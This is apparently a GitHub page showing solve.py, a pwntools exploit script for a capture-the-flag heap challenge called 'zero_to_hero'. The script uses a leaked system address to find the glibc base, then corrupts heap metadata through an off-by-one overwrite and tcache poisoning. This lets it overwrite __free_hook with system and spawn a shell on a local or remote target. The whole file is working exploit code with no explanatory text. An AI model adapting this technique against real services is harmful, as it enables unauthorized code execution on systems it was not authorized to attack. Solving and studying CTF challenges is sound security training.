-
Notifications
You must be signed in to change notification settings - Fork 4
/
solve.py
59 lines (38 loc) · 1.21 KB
/
solve.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
#!/usr/bin/env python3
from pwn import *
context.binary = elf = ELF('zero_to_hero')
glibc = ELF('libc.so.6', checksec=False)
def get_process():
if len(sys.argv) == 1:
return elf.process()
host, port = sys.argv[1], sys.argv[2]
return remote(host, int(port))
def alloc(p, size: int, data: bytes):
p.sendlineafter(b'> ', b'1')
p.sendlineafter(b'> ', str(size).encode())
p.sendafter(b'> ', data)
def free(p, index: int):
p.sendlineafter(b'> ', b'2')
p.sendlineafter(b'> ', str(index).encode())
def main():
p = get_process()
p.sendlineafter(b'So, you want to be a hero?\n', b'y')
p.recvuntil(b"It's dangerous to go alone. Take this: ")
system_addr = int(p.recvline().decode(), 16)
glibc.address = system_addr - glibc.sym.system
log.success(f'Glibc base address: {hex(glibc.address)}')
alloc(p, 0x108, b'AAAA')
alloc(p, 0x108, b'BBBB')
alloc(p, 0x0f8, b'CCCC')
free(p, 1)
free(p, 2)
free(p, 0)
alloc(p, 0x108, b'A' * 0x108)
free(p, 1)
alloc(p, 0x0f8, p64(glibc.sym.__free_hook))
alloc(p, 0x108, b'/bin/sh\0')
alloc(p, 0x108, p64(system_addr))
free(p, 1)
p.interactive()
if __name__ == '__main__':
main()